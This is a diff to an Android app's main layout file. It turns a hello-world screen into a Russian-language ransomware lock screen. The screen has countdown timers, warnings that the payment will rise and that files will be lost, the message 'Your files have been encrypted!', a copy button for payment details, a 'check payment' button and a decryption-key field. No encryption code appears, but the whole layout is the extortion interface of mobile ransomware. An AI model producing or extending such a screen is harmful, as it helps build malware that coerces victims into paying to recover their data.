--- a/app/src/main/res/layout/main.xml
+++ b/app/src/main/res/layout/main.xml
@@ -1,11 +1,393 @@
-<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
-    android:layout_width="match_parent"
-    android:layout_height="match_parent"
-    android:gravity="center">
+<?xml version="1.0" encoding="utf-8"?>
+<LinearLayout
+	xmlns:android="http://schemas.android.com/apk/res/android"
+	android:layout_width="fill_parent"
+	android:layout_height="fill_parent"
+	android:background="#ff851016"
+	android:gravity="center"
+	android:orientation="vertical"
+	android:weightSum="15.0">
 
-    <TextView
-        android:text="@string/hello_world"
-        android:layout_width="wrap_content"
-        android:layout_height="wrap_content" />
+	<LinearLayout
+		android:layout_width="fill_parent"
+		android:layout_height="0.0dip"
+		android:layout_marginTop="5.0dip"
+		android:layout_weight="11.0"
+		android:orientation="vertical"
+		android:weightSum="10.0">
+
+		<LinearLayout
+			android:layout_width="match_parent"
+			android:layout_height="0.0dip"
+			android:layout_weight="3.0"
+			android:gravity="center"
+			android:orientation="horizontal"
+			android:weightSum="10.0">
+
+			<ImageView
+				android:layout_width="0.0dip"
+				android:layout_height="wrap_content"
+				android:layout_marginLeft="5.0dip"
+				android:layout_marginRight="2.0dip"
+				android:layout_weight="2.0"
+				android:adjustViewBounds="true"
+				android:background="@drawable/lock_icon_bg"
+				android:src="@drawable/lock"/>
+
+			<LinearLayout
+				android:layout_width="0.0dip"
+				android:layout_height="fill_parent"
+				android:layout_marginRight="10.0dip"
+				android:layout_weight="4.0"
+				android:background="@drawable/lock_icon_bg"
+				android:gravity="bottom"
+				android:orientation="horizontal">
+
+				<LinearLayout
+					android:layout_width="0.0dip"
+					android:layout_height="fill_parent"
+					android:layout_weight="9.0"
+					android:orientation="vertical"
+					android:weightSum="13.0">
+
+					<TextView
+						android:layout_width="fill_parent"
+						android:layout_height="0.0dip"
+						android:layout_weight="4.0"
+						android:gravity="center"
+						android:paddingTop="3.0dip"
+						android:text="Оплата будет повышена"
+						android:textColor="#ffd89660"
+						android:textSize="9.0sp"/>
+
+					<TextView
+						android:id="@+id/jed"
+						android:layout_width="fill_parent"
+						android:layout_height="0.0dip"
+						android:layout_weight="2.0"
+						android:gravity="center"
+						android:text="Текст"
+						android:textColor="#fffadbd6"
+						android:textSize="8.0sp"/>
+
+					<TextView
+						android:layout_width="fill_parent"
+						android:layout_height="0.0dip"
+						android:layout_weight="3.0"
+						android:gravity="center"
+						android:text="Время выйдет через"
+						android:textColor="#fffadbd6"
+						android:textSize="9.0sp"/>
+
+					<TextView
+						android:id="@+id/je"
+						android:layout_width="fill_parent"
+						android:layout_height="0.0dip"
+						android:layout_weight="4.0"
+						android:gravity="center"
+						android:paddingTop="2.0dip"
+						android:text="Текст"
+						android:textColor="#ffded0de"
+						android:textSize="16.0sp"/>
+
+				</LinearLayout>
+
+			</LinearLayout>
+
+			<LinearLayout
+				android:layout_width="0.0dip"
+				android:layout_height="fill_parent"
+				android:layout_marginRight="5.0dip"
+				android:layout_weight="4.0"
+				android:background="@drawable/lock_icon_bg"
+				android:gravity="bottom"
+				android:orientation="horizontal">
+
+				<LinearLayout
+					android:layout_width="0.0dip"
+					android:layout_height="fill_parent"
+					android:layout_weight="9.0"
+					android:orientation="vertical"
+					android:weightSum="13.0">
+
+					<TextView
+						android:layout_width="fill_parent"
+						android:layout_height="0.0dip"
+						android:layout_weight="4.0"
+						android:gravity="center"
+						android:paddingTop="3.0dip"
+						android:text="Ваши файлы будут потеряны"
+						android:textColor="#ffd89660"
+						android:textSize="9.0sp"/>
+
+					<TextView
+						android:id="@+id/scd"
+						android:layout_width="fill_parent"
+						android:layout_height="0.0dip"
+						android:layout_weight="2.0"
+						android:gravity="center"
+						android:text="Текст"
+						android:textColor="#fffadbd6"
+						android:textSize="8.0sp"/>
+
+					<TextView
+						android:layout_width="fill_parent"
+						android:layout_height="0.0dip"
+						android:layout_weight="3.0"
+						android:gravity="center"
+						android:text="Время выйдет через"
+						android:textColor="#fffadbd6"
+						android:textSize="9.0sp"/>
+
+					<TextView
+						android:id="@+id/sc"
+						android:layout_width="fill_parent"
+						android:layout_height="0.0dip"
+						android:layout_weight="4.0"
+						android:gravity="center"
+						android:paddingTop="2.0dip"
+						android:text="Текст"
+						android:textColor="#ffded0de"
+						android:textSize="16.0sp"/>
+
+				</LinearLayout>
+
+			</LinearLayout>
+
+		</LinearLayout>
+
+		<LinearLayout
+			android:layout_width="fill_parent"
+			android:layout_height="0.0dip"
+			android:layout_weight="7.0"
+			android:orientation="vertical">
+
+			<TextView
+				android:layout_width="fill_parent"
+				android:layout_height="wrap_content"
+				android:gravity="center"
+				android:text="Ваши файлы были зашифрованы!"
+				android:textColor="#fffadbd6"/>
+
+			<ScrollView
+				android:layout_width="fill_parent"
+				android:layout_height="fill_parent"
+				android:overScrollMode="never">
+
+				<LinearLayout
+					android:layout_width="match_parent"
+					android:layout_height="match_parent"
+					android:background="#fffdfdfd"
+					android:orientation="vertical">
+
+					<TextView
+						android:id="@+id/bt1"
+						android:layout_width="match_parent"
+						android:layout_height="wrap_content"
+						android:textColor="#ff000000"
+						android:textSize="16.0sp"/>
+
+					<TextView
+						android:id="@+id/nr1"
+						android:layout_width="match_parent"
+						android:layout_height="wrap_content"
+						android:textColor="#ff323131"
+						android:textSize="13.0sp"/>
+
+					<TextView
+						android:id="@+id/bt2"
+						android:layout_width="match_parent"
+						android:layout_height="wrap_content"
+						android:layout_marginTop="20.0dip"
+						android:textColor="#ff000000"
+						android:textSize="16.0sp"/>
+
+					<TextView
+						android:id="@+id/nr2"
+						android:layout_width="match_parent"
+						android:layout_height="wrap_content"
+						android:textColor="#ff323131"
+						android:textSize="13.0sp"/>
+
+					<TextView
+						android:id="@+id/bt3"
+						android:layout_width="match_parent"
+						android:layout_height="wrap_content"
+						android:layout_marginTop="20.0dip"
+						android:textColor="#ff000000"
+						android:textSize="16.0sp"/>
+
+					<TextView
+						android:id="@+id/nr3"
+						android:layout_width="match_parent"
+						android:layout_height="wrap_content"
+						android:textColor="#ff323131"
+						android:textSize="13.0sp"/>
+
+					<TextView
+						android:id="@+id/bt4"
+						android:layout_width="match_parent"
+						android:layout_height="wrap_content"
+						android:layout_marginTop="20.0dip"
+						android:textColor="#ff000000"
+						android:textSize="16.0sp"/>
+
+					<TextView
+						android:id="@+id/nr4"
+						android:layout_width="wrap_content"
+						android:layout_height="wrap_content"
+						android:textColor="#ff323131"
+						android:textSize="13.0sp"/>
+
+					<TextView
+						android:id="@+id/nr5"
+						android:layout_width="wrap_content"
+						android:layout_height="wrap_content"
+						android:layout_marginTop="20.0dip"
+						android:textColor="#ffff0f00"
+						android:textSize="13.0sp"/>
+
+				</LinearLayout>
+
+			</ScrollView>
+
+		</LinearLayout>
+
+	</LinearLayout>
+
+	<ScrollView
+		android:id="@+id/ScrollView"
+		android:layout_width="fill_parent"
+		android:layout_height="0.0dip"
+		android:layout_weight="4.0"
+		android:overScrollMode="never"
+		android:scrollbars="none">
+
+		<LinearLayout
+			android:layout_width="match_parent"
+			android:layout_height="match_parent"
+			android:gravity="bottom"
+			android:orientation="vertical"
+			android:weightSum="6.0">
+
+			<LinearLayout
+				android:layout_width="match_parent"
+				android:layout_height="wrap_content"
+				android:layout_weight="1.0"
+				android:gravity="bottom"
+				android:orientation="horizontal">
+
+				<TextView
+					android:id="@+id/lx"
+					android:layout_width="match_parent"
+					android:layout_height="fill_parent"
+					android:layout_marginLeft="3.0dip"
+					android:text="Свяжитесь с нами"
+					android:textColor="#ff5ea9ba"
+					android:textSize="14.0sp"
+					android:layout_weight="1"
+					android:gravity="center"/>
+
+				<TextView
+					android:id="@+id/jr"
+					android:layout_width="match_parent"
+					android:layout_height="fill_parent"
+					android:layout_marginLeft="10.0dip"
+					android:text="Присоединяйтесь к нам"
+					android:textColor="#ff5ea9ba"
+					android:textSize="14.0sp"
+					android:layout_weight="1"
+					android:gravity="center"/>
+
+			</LinearLayout>
+
+			<TextView
+				android:id="@+id/zfje"
+				android:layout_width="fill_parent"
+				android:layout_height="wrap_content"
+				android:layout_weight="1.0"
+				android:gravity="center"
+				android:textColor="#ffd89660"
+				android:textSize="11.0sp"/>
+
+			<LinearLayout
+				android:layout_width="fill_parent"
+				android:layout_height="wrap_content"
+				android:layout_marginTop="10.0dip"
+				android:layout_weight="2.0"
+				android:background="@drawable/lock_icon_bg"
+				android:gravity="center"
+				android:orientation="horizontal"
+				android:weightSum="10.0">
+
+				<TextView
+					android:id="@+id/wb"
+					android:layout_width="0.0dip"
+					android:layout_height="wrap_content"
+					android:layout_weight="6.0"
+					android:background="@drawable/lock_icon_bg"
+					android:gravity="center"
+					android:textColor="#fffadbd6"
+					android:textSize="12.0sp"/>
+
+				<Button
+					android:id="@+id/fz"
+					android:layout_width="wrap_content"
+					android:layout_height="wrap_content"
+					android:layout_weight="2.0"
+					android:text="Копировать"
+					android:textAllCaps="false"
+					android:textColor="#ff000000"
+					android:textSize="10.0sp"/>
+
+				<Button
+					android:id="@+id/check_payment_button"
+					android:layout_width="wrap_content"
+					android:layout_height="wrap_content"
+					android:layout_weight="2.0"
+					android:text="Проверить оплату"
+					android:textAllCaps="false"
+					android:textColor="#ff000000"
+					android:textSize="10.0sp"/>
+
+			</LinearLayout>
+
+			<LinearLayout
+				android:layout_width="match_parent"
+				android:layout_height="wrap_content"
+				android:layout_marginBottom="3.0dip"
+				android:layout_weight="2.0"
+				android:orientation="horizontal"
+				android:weightSum="10.0"
+				android:gravity="center">
+
+				<EditText
+					android:id="@+id/ed"
+					android:layout_width="wrap_content"
+					android:layout_height="48dp"
+					android:layout_weight="7.0"
+					android:cursorVisible="false"
+					android:focusable="false"
+					android:hint="Пожалуйста, введите свой ключ!"
+					android:maxLength="50"
+					android:textSize="13.0sp"/>
+
+				<Button
+					android:id="@+id/bt"
+					android:layout_width="wrap_content"
+					android:layout_height="wrap_content"
+					android:layout_weight="3.0"
+					android:enabled="false"
+					android:text="Невозможно расшифровать"
+					android:textAllCaps="false"
+					android:textColor="#ff000000"
+					android:textSize="10.0sp"/>
+
+			</LinearLayout>
+
+		</LinearLayout>
+
+	</ScrollView>
 
 </LinearLayout>
+
